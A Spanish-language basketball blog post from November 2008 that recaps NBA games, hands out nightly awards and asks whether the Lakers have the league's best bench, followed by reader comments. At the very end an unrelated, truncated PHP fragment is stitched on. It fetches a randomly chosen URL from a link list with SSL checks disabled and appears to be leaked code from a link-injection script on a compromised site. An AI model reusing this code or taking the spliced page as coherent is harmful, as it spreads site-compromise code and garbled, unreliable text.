La Crónica (25/11/2008)

26 de November de 2008 por MagicJohnson32

Y el MORBO llegó al Madison. Ni Jordan despertó en su día tanto sentimiento de deseo en el mítico pabellón, quizás porque jamás lo tuvieron al alcance de la mano. La ilusa sensación que se respiraba anoche era casi de bienvenida al ídolo con toda la parafernalia del mundo y LeBron, encima, dejándose querer. Fue más un circo que un partido de baloncesto; la pena fue que los Knicks no dieron suficientemente la talla como para hacer lucirse al Deseado y, para colmo de males, se lesionó Nate Robinson (y Marbury, descojonándose en su casa). En fin, que el papelón como franquicia de los Cavs era de pandereta anoche. Quién sabe si el careto de tonto se les quedará a ellos o a los otros de aquí a dos años. Mientras tanto, el rapero amigo de LeBron chupó cámara en la TV y fue el verdadero ganador de la noche. Excelso ejercicio de mercadotecnia.

Los Lakers, sin sudar mucho, barrieron a los Nets con Pau Gasol en plan estrella y Kobe de perro de presa, lo que hace evidente que el escolta pasa completamente del MVP. La genialidad al servicio del grupo es lo más productivo que existe. A tiro el 17-1 de Jordan.

El otro “ogro” en liza anoche se dio un susto tremebundo en Oklahoma. Con Shaq descansando el cuerpo los Suns ganaron más por coña que por otra cosa y durante mucho rato tuvieron el partido perdido. Perder contra los Thunder, ahora mismo, es tan vergonzoso que motiva.

Si ayer hablábamos de la justificación del despido de Eddie Jordan, anoche sus ex-pupilos nos dieron una de las posibles claves. Un equipo con los problemas continuos que éste está sufriendo termina dejándose vencer por las adversidades, bajando los brazos. Con algún estímulo quizás se puede cambiar el panorama… o quizás no. Anoche fue que sí contra los Warriors.

Por último, Dallas, con un buen partido de Jason Terry saliendo desde el banquillo (¿otro aspirante al galardón de mejor sexto hombre?), logró equilibrar su balance contra unos Pacers que no levantan cabeza.

Y a continuación las 10 mejoras jugadas de anoche:

CONCLUSIONES

– Anoche, con su equipo 12 puntos abajo en el último cuarto ante el peor conjunto de la liga, Steve Nash resucitó. Sin Shaq en pista, el base canadiense pudo correr, anotar, pasar y ser decisivo como en tantas otras veces le hemos visto en las últimas campañas. Los Suns remontaron, claro. Echábamos de menos al auténtico Nash, ése que la influencia de O’Neal en el juego nos impide ver.

– Los Lakers, que anoche atropellaron a los Nets, ya están 12-1. Kobe promedia apenas 33 minutos de juego; Gasol, poco más de 34. El Bench Mob arrasa. El resto de la liga tiembla.

– Será casualidad pero en el primer partido sin Eddie Jordan en el banquillo de los Wizards, Blatche firmó una actuación histórica. 25-12-5-5 saliendo como suplente. Antes, sólo un jugador había alcanzado estas cifras en cada una de las categorías sin jugar de inicio. Fue un tal Charles Barkley.

– Suponemos que los Knicks esperan reunir algo más que espacio salarial para convencer a LeBron James, porque uno mira la plantilla que tienen ahora y cuesta imaginar que The King los prefiera a sus actuales Cavs.

PREMIOS

MVP: Caron Butler logró no sólo la mejor actuación de la noche, sino una de las mejores de la actual temporada. Anotó 13 de sus 19 tiros de campo, 3 de 4 en triples y 6 de 7 en tiros libres para un total de 35 puntos a los que añadió 8 rebotes, 6 asistencias y 3 recuperaciones en algo menos de 38 minutos de juego.

El rookie: Brook López ha pasado de ser un suplente de lo más mediocre a un notable titular. Desde que sale de inicio está demostrando una gran regularidad y anoche, pese a la derrota de su equipo, no fue una excepción al lograr 17 puntos, 10 rebotes y 3 tapones. Por cierto, algo similar le ocurre a su hermano, que ante el descanso de Shaq fue titular por segunda vez en la temporada y, como en la primera ocasión, volvió a rendir muy por encima de sus actuaciones cuando sale desde el banquillo. También se ha de mencionar a Westbrook, con 15 puntos, 5 rebotes, 5 asistencias y 3 robos, además de buenos porcentajes, algo que no le solemos ver.

La sorpresa: Sabemos del potencial de Blatche, pero no esperábamos que la marcha de Eddie Jordan le sentase tan bien y tan rápido. 25 puntos, 12 rebotes, 5 asistencias, 5 tapones y 2 robos logró ante los Warriors el alero de cuarto año, que anoche compitió en cuanto a la sorpresa del día con su compañero de generación Antoine Wright: 24 puntos, su máximo profesional, con 10 de 18 en tiros en sustitución del nuevamente lesionado Josh Howard.

La decepción: Sinceramente, esperábamos una actuación monstruosa de LeBron en su tan anunciada visita al Madison, y lo que nos brindó fue algo propio de un simple mortal, con 26 puntos, 4 rebotes y 1 asistencia. ¿Se guardó la dinamita para cuando juegue allí como local?

El mayor esfuerzo en vano: Durant volvió a ver como sus 29 puntos no alcanzaron para amarrar un triunfo que tuvieron en la mano frente a los Suns, como también sucedió a Troy Murphy y Danny Granger, que se combinaron para anotar 43 puntos y atrapar 25 rebotes en la derrota de los Pacers en Dallas.

La pregunta: ¿Cuentan los Lakers con el mejor banquillo de la liga?

Comenta

7 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Respuesta a la pregunta:

    Sin lugar a dudas SÍ. Tal y como están Farmar, Odom y Ariza ellos sólos ya formarían la estructura básica de algunos equipos de la liga.
    Es muy fuerte que el 4º en discordia este año esté siendo Vujacic… sin estar jugando mal, ojo.

    Piensa en un quinteto Farmar-Vujacic-Ariza-Odom y (Bynum o Pau que siempre queda uno de los dos) y le pegas un repaso a más de uno.
    Casi me fastidia que no jueguen nada Walton, Mihm y Powell (ahí es nada… porque podrían/deberían entrar perfectamente)

    Yo siempre he defendido que a este equipo le hace falta un 3er base para evitar disgustos. El problema es que ahora mismo no sabría de quien prescindir de todos los anteriores… así que no me parece mala solución que Vujacic ejerza de base y Ariza de escolta en el caso de que tuvieramos alguno de los dos bases no pudiera jugar por lo que fuera.

    Un último apunte. No estoy de acuerdo con los minutos que juegan Kobe y Pau. Me parecen demasiados y es un punto clave que nos puede perjudicar (de hecho ya nos ha perjudicado anteriormente)

      Citar

  2. MagicJohnson32 dice:
    #2

    Juas, Deer, para que te hagas una idea de lo poco que está jugando Kobe… promedia menos minutos que Roger Mason o Azubuike. No jugaba tan poco desde su año sophomore. Y no es sólo eso, sino que en los minutos que juega no ha de desgastarse mucho.

    Y discrepo en lo de Vujacic. A mí sí me parece que está jugando mal. Que es normal, eh, porque prácticamente no pudo hacer pretemporada por la lesión. Y ya empieza a dar alguna muestra de recuperación, pero aún sigue lejos del nivel del año pasado y de demostrar que merece su reluciente contratito. Pero se le ve un poco obsesionado y ya le cayó la bronca de Ariza por egoísta.

      Citar

  3. TheDeerHunter dice:
    #3

    Supongo que si nos ponemos a discutir si ha jugado opinablemente mal o no me llevas ventaja pues habrás visto jugar este año al equipo bastante más que yo.

    Sobre lo que yo he visto, no se puede decir que Vujacic lo esté haciendo objetivamente mal… independientemente del contrato que tiene firmado. En general mantiene unos porcentajes aceptables, por no decir buenos y también unos números globales bastante razonables con respecto a los minutos que juega.
    ¿Es mejorable? ¿se le debe de exigir más?? ¿él mismo lo está pasando mal con su situación y rendimiento?? Seguro que a todas las preguntas podemos responder que sí, pero para mí esas no son razones suficientes como para afirmar que está jugando mal… me parece demasiado fuerte esa calificación en su caso. Estamos hablando de únicamente 15 minutos de juego, con casi 6ppp, 2rebs, 1asis y 1rob… 38% en triples y en tiros de campo (ahí patina un poco) No es razonable exigirle muchísimo más con la competitividad a la que se enfrenta ahora mismo.

    Tal y como están las cosas en este equipo ahora mismo con 8 tíos haciéndolo de cine, tener un rendimiento normal canta demasiado.
    Perdonad, pero si pensáis que Vujacic lo tiene que hacer mucho mejor por narices que Ariza u Odom ahora mismo es que le estais pidiendo peras al olmo.

      Citar

  4. Txusma dice:
    #4

    Venga, venga, no nos flipemos tanto. Estoy de acuerdo de q el banco de los Lakers es, ahora mismo, el mejor de la liga pero de ahi a decir q un quinteto Farmar-Vujacic-Ariza-Odom y Bynum le daria repasos a mas de un equipo NBA va un trecho. Primero y principal pq Odom ya ha demostrado que lo de ser primera espada no le va y segundo pq quieras q no Farmar-Vujacic y Ariza no dejan de ser eso: jugadores de banquillo o complementos. Muy necesarios en todos los equipos, pero no fundamentales por si solos.

      Citar

  5. MagicJohnson32 dice:
    #5

    No, qué va, Ariza y Odom son mucho mejores que Sasha. Yo al olmo le pido… ¿qué da el olmo, a parte de sombra?… En fin, que yo a Sasha le pido lo que hizo el año pasado, y no que vuelva a hacer lo de hace dos temporadas. Si un 38% te parece un porcentaje aceptable tirando a bueno para un tío que apenas aporta en otras facetas…

    A mí me sigue gustando su determinación para tirar. Creo que es fundamental que la gente de banquillo no tenga miedo a fallar. Eso no quita para que Sasha no esté al nivel que debería.

      Citar

  6. Jabho dice:
    #6

    Pues yo tambien creo que Vujacic está a bajo nivel. Como dice Magic su aportación casi única es el tiro. SI va a tirar como Farmar me quedo con Farmar. Pero coincido que el problema fue que no hizo preseason.

    Respecto a la pregunta la cosa es que no hemos visto dónde está el listón de los Lakers este año. Tampoco el de los Celtics si soy sincero. A ambos les veo mejor que el año pasado.

    En una regular larga en partidos, minutos y cansada en desplazamientos estoy convencido que el banco y plantilla de los Lakers les va a dar para ganarla “fácil”. Porque si, me parece el mejor banco.

    Pero en los PO que a lo mejor nos vemos en que 3 o 4 jugadores se van a 40 minutos y que con una rotación corta de 7 tíos te puede dar de sobra para ganar no sé. Realmente creo que ahora mismo los C´s tienen el mejor quinteto de la liga. Y eso con poco banco en PO puede valer…

      Citar

  7. aro_pasado_no_newtoniano dice:
    #7

    ¿Para cuando un partido homenaje a Eddie Jordan?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>